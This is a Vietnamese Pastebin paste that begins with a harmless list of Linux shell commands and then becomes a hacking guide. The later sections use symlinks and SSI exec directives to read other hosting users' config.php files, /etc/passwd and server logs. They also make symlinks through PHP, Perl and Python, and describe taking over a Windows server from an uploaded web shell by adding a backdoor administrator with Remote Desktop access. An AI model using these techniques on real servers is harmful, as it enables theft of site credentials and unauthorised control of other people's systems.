Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --------------------------------------------------------
- - Lệnh hay dùng trên shell, method local, v...v...v... -
- --------------------------------------------------------
- ls: lấy danh sách tất cả các file và folder trong folder hiện hành.
- pwd: xuất đường dẫn của folder làm việc.
- cd: thay đổi folder làm việc đến một folder mới.
- mkdir: tạo folder mới. | mkdir MonKira | Tạo Thư Mục MonKira
- rmdir: xoá folder rỗng. | rmdir MonKira | Xóa Thư Mục MonKira
- rm -r: xóa thư mục và tất cả tập tin và thư mục con trong thư mục đó | rm -r MonKira | Xóa thưu mục + các file trong thư mục
- cp: copy file | cp /home/MonKira/public_html/MonKira.php /home/MonKira/public_html/MonKira002.php |
- mv: đổi tên hay di chuyển file, folder.
- rm: xóa file. | rm MonKira.php | xóa file MonKira.php
- wc: đếm số dòng, số kí tự | wc MonKira.php | #Số dòng #Số từ #Số ký tự MonKira.php
- touch: tạo file. | touch MonKira.php | Tạo file MonKira.php
- cat=less=more: xem nội dung file. | cat MonKira.php | xem nội dung file MonKira.php
- vi: khởi động trình soạn thảo văn bản vi.
- df: kiểm tra disk space. không gian đĩa
- du: xem disk space đã dùng cho một số file nhất định.
- tar -cvzpf archive.tgz /home/example/public_html/folder: nén một folder
- tar -tzf backup.tar.gz: liệt kê file nén gz.
- tar -xvf archive.tar: giải nén một file tar.
- unzip MonKira.zip: giải nén MonKira .zip
- wget: download file. | wget http://www.google.com/robots.txt |
- chown -hR user:user folder/ : Đổi owner cho folder hay file.
- tail 100 matbao.log: Xem 100 dòng cuối cùng của file matbao.log.
- date: xem ngày, giờ hệ thống.
- cal: Hiển thị lịch
- info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
- grep: grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
- head: | head tentaptin | Hiển thị 10 dòng đầu tiên của tập tin
- tail |tail tentaptin | Hiển thị 10 dòng cuối cùng của tập tin
- mv: Di chuyển hoặc đổi tên tập tin | mv tentaptincu tentaptinmoi | mv MonKira.php MonKira.php |
- echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh | echo Checked By: MonKira |
- gzip: Nén một tập tin | gzip tentaptin | gzip MonKira.php | gzip /home/MonKira/public_html/MonKira.php |
- gunzip : giải nén tệp tin | gunzip tenteptin.gz | gunzip /home/MonKira/public_html/MonKira.gz |
- which lenh: Hiển thị đường dẫn tới lệnh
- whereis lenh: Hiển thị đường tới nơi chứa lệnh
- who: Hiển thị các người dùng đã đang nhập
- chmod: thay đổi quyền thư mục/tệp tin | chmod 777 MonKira / chmod 777 MonKira.php |
- hostname: Hiển thị tên định danh của hệ thống
- clear: làm sạch cửa sổ dòng lệnh
- sleep: cho hệ thống ngừng hoạt động trong một khoảng thời gian. | sleep 5 | tính bằng giây
- cat /proc/cpuinfo: Tìm chi tiết kỹ thuật của CPU
- cat /proc/meminfo: Bộ nhớ và trang đổi thông tin.
- uname -r: Xem hạt nhân phiên bản. kernel
- gcc -v: Compiler phiên bản nào tôi đã cài đặt.
- /sbin/ifconfig: Xem các địa chỉ IP
- reboot: khởi động lại hệ thống. phải có quyền root
- ////////////////////////// Local attack ////////////////////////////////////////
- Sử dụng symlink kết hợp với ssi khi bị 403 forbinden:
- symbolick : Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php MonKira.ini
- Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- - Tạo 1 file MonKira.shtml với nội dung như sau:
- <!--#include virtual="MonKira.ini"-->
- Trong đó file MonKira.ini là file đã được symbolic link trên server.
- Bây giờ view source của file MonKira.shtml ta sẽ thấy đc nội dung file MonKira.ini đã symbolic link.
- hoặc: <!--#exec cmd="dir /home/victim/public_html/" -->
- ------------------------------------------------------------------------
- Chạy lệnh bằng file .shtml
- - Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
- <!--#exec cmd="cat /etc/passwd"-->
- - Lệnh xem file logs như sau:
- <!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
- Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
- + /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
- + Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>Tư duy Local Nâng cao ( Tạo File symlink )
- [+] Tạo symlink qua run command
- Khi không thể run command bằng PHP shell ta run command bằng perl , python shell
- ln -s /home/user/public_html/forum/includes/config.php 1.txt
- [+] Tạo file symlink bằng hàm của PHP
- <?php
- $target = '/home/user_target/public_html/forum/includes/config.php';
- $link = '/home/user/public_html/1.txt';
- symlink($target, $link);
- ?>
- [+] Tạo File symlink nhờ perl , python
- #!/usr/bin/perl -w
- symlink('/etc/passwd','/root/Desktop/sym.txt');
- #!/usr/bin/python
- print "Content-type: text/html\n\n"
- import os
- filename = "1.txt"
- linkto = "/etc/passwd"
- os.symlink(linkto, filename)
- [+] Thông qua bug
- http://pastebin.com/DghFwrEP
- [+] Indirect Symlink
- Cơ sở là tạo 1 file symlink ở 1 nơi có thể tạo được rồi nén lại
- Upload lên nơi cần symlink rồi giải nén
- ln -s / r00t -> Tạo File symlink với thư mục /
- tar czvf r00t.tar.gz r00t -> Nén file r00t thành r00t.tar.gz
- Giải nén
- tar xzf r00t.tar.gz
- >>>>>>>>>>>>>> WinDows
- ______________________________________________
- | Chiếm quyền Dedicated Windows Server (VPS) |
- | (Chiếm VPS Từ Shell) |
- ----------------------------------------------
- [Các bước thực hiện]
- {1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).
- {2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full
- quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.
- {3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.
- {4} Tạo 1 user mới trên server bằng lệnh. Trong đó MonKira là User và MonKira@001 là mật khẩu:
- net user MonKira MonKira@001 /ADD
- {5} Set quyền remote desktop cho user MonKira bằng lệnh:
- net localgroup "Remote Desktop Users" MonKira /ADD
- {6} Nếu thành công thì bạn sẽ nhận được kết quả trả về như sau:
- The command completed successfully.
- {7} Sử dụng chức năng Remote Desktop của Windows để kết nối và điều khiển server !
- -----------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement